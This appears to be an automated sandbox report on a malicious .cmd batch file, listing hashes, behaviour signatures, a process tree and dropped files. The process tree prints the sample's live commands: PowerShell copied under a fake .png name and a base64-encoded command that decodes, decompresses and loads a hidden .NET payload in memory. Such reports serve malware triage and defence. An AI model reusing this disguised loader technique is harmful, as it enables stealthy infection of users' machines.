892878473baaf294986e9fa9f802688696f691d08ba5d59518a6bd34ee94d180

General

Target

66437259013770329427019628916414592160995.cmd
Size

1.3MB
MD5

e21d8e337a80d52e07057207cd5b830d
SHA1

752343b5a6ed84bb00025f4289ab47272eab7d51
SHA256

74f81ce57b2e9068d2695b61a554a06b77155c94a1345d1cdab13ed6efd185dd
SHA512

380b76c4e521fa1f59c90bfc8e94fc87fdb9458d781bac31b1f204634854b020d4dac53838becb90270df73c1fcc88419571db0bded8975f502227fb59294552
SSDEEP

24576:OdEhm0FoOBCdKauPkEf5b2JDbXd/+7b0iWba2Qy714X4tD4bzM:fUuxf52U0iWesF

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1864	Xdpzaqc.png

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1864	Xdpzaqc.png
1864	Xdpzaqc.png

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1864	Xdpzaqc.png

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1864	Xdpzaqc.png

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 4252	2976	cmd.exe	85
PID 2976 wrote to memory of 4252	2976	cmd.exe	85
PID 2976 wrote to memory of 4116	2976	cmd.exe	86
PID 2976 wrote to memory of 4116	2976	cmd.exe	86
PID 2976 wrote to memory of 1776	2976	cmd.exe	87
PID 2976 wrote to memory of 1776	2976	cmd.exe	87
PID 1776 wrote to memory of 780	1776	cmd.exe	89
PID 1776 wrote to memory of 780	1776	cmd.exe	89
PID 1776 wrote to memory of 448	1776	cmd.exe	90
PID 1776 wrote to memory of 448	1776	cmd.exe	90
PID 1776 wrote to memory of 1624	1776	cmd.exe	91
PID 1776 wrote to memory of 1624	1776	cmd.exe	91
PID 1776 wrote to memory of 1508	1776	cmd.exe	92
PID 1776 wrote to memory of 1508	1776	cmd.exe	92
PID 1776 wrote to memory of 1864	1776	cmd.exe	93
PID 1776 wrote to memory of 1864	1776	cmd.exe	93
PID 1776 wrote to memory of 1864	1776	cmd.exe	93

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\66437259013770329427019628916414592160995.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo F "
  2⤵
  PID:4252
- C:\Windows\system32\xcopy.exe
  xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png
  2⤵
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\66437259013770329427019628916414592160995.cmd"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:780
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png
    3⤵
    PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:1624
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\66437259013770329427019628916414592160995.cmd C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png.bat
    3⤵
    PID:1508
- - C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png
    C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png -win 1 -enc JABLAGkAdQBtAGUAawBwAGQAeABpAHAAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQASABmAGkAegBpAGwAawByAG0AaAB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEsAaQB1AG0AZQBrAHAAZAB4AGkAcAApADsAJABOAGMAZAB1AHoAawB1AGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEgAZgBpAHoAaQBsAGsAcgBtAGgAegAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABBAGgAbABjAGwAegBvAGsAZABuAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQATgBjAGQAdQB6AGsAdQBpACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABBAGgAbABjAGwAegBvAGsAZABuAGMALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEEAaABsAGMAbAB6AG8AawBkAG4AYwAuAEMAbABvAHMAZQAoACkAOwAkAE4AYwBkAHUAegBrAHUAaQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEgAZgBpAHoAaQBsAGsAcgBtAGgAegAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABIAGYAaQB6AGkAbABrAHIAbQBoAHoAKQA7ACAAJABEAHAAbABpAGEAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABIAGYAaQB6AGkAbABrAHIAbQBoAHoAKQA7ACAAJABFAHkAYwBwAHYAbQB4AHgAagB0AGkAIAA9ACAAJABEAHAAbABpAGEAbAAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAFcAdAB2AHcAZgAgAD0AIAAkAEUAeQBjAHAAdgBtAHgAeABqAHQAaQAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1864

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\DrWin\Rlog.dat

Filesize
144B

MD5
75d8066ab4aa32752f5202177195b8c3

SHA1
ef9c736b5c6ff2638e9a170b6698b6f173490604

SHA256
a8b298afeea79efe0bb194cc9e2d7275ae7ae8f08a104320b865c7b12c19c835

SHA512
ecc53345d4cc8f676d819c06e025d694aa0aa357c13680140599d297bb99e0dff10c8512e5cacbb28d72be5dbe5e8bf1e8fa029c2e03a53e70f01117c347c12c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png.bat

Filesize
1.3MB

MD5
e21d8e337a80d52e07057207cd5b830d

SHA1
752343b5a6ed84bb00025f4289ab47272eab7d51

SHA256
74f81ce57b2e9068d2695b61a554a06b77155c94a1345d1cdab13ed6efd185dd

SHA512
380b76c4e521fa1f59c90bfc8e94fc87fdb9458d781bac31b1f204634854b020d4dac53838becb90270df73c1fcc88419571db0bded8975f502227fb59294552

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arhgcpg3.scn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1864-13-0x0000000004B60000-0x0000000004BC6000-memory.dmp

Filesize
408KB

Download
memory/1864-28-0x0000000002110000-0x0000000002120000-memory.dmp

Filesize
64KB

Download
memory/1864-11-0x0000000004C60000-0x0000000005288000-memory.dmp

Filesize
6.2MB

Download
memory/1864-14-0x0000000005290000-0x00000000052F6000-memory.dmp

Filesize
408KB

Download
memory/1864-10-0x00000000024E0000-0x0000000002516000-memory.dmp

Filesize
216KB

Download
memory/1864-20-0x0000000005480000-0x00000000057D4000-memory.dmp

Filesize
3.3MB

Download
memory/1864-25-0x0000000005B10000-0x0000000005B2E000-memory.dmp

Filesize
120KB

Download
memory/1864-26-0x0000000005B50000-0x0000000005B9C000-memory.dmp

Filesize
304KB

Download
memory/1864-9-0x0000000002110000-0x0000000002120000-memory.dmp

Filesize
64KB

Download
memory/1864-12-0x0000000004AC0000-0x0000000004AE2000-memory.dmp

Filesize
136KB

Download
memory/1864-29-0x00000000071A0000-0x000000000781A000-memory.dmp

Filesize
6.5MB

Download
memory/1864-30-0x0000000006040000-0x000000000605A000-memory.dmp

Filesize
104KB

Download
memory/1864-31-0x0000000006B20000-0x0000000006C26000-memory.dmp

Filesize
1.0MB

Download
memory/1864-32-0x0000000006C20000-0x0000000006C9A000-memory.dmp

Filesize
488KB

Download
memory/1864-33-0x0000000006DA0000-0x0000000006E06000-memory.dmp

Filesize
408KB

Download
memory/1864-35-0x0000000007020000-0x00000000070A1000-memory.dmp

Filesize
516KB

Download
memory/1864-37-0x0000000075070000-0x0000000075820000-memory.dmp

Filesize
7.7MB

Download
memory/1864-40-0x0000000002110000-0x0000000002120000-memory.dmp

Filesize
64KB

Download
memory/1864-43-0x0000000002110000-0x0000000002120000-memory.dmp

Filesize
64KB

Download
memory/1864-8-0x0000000075070000-0x0000000075820000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing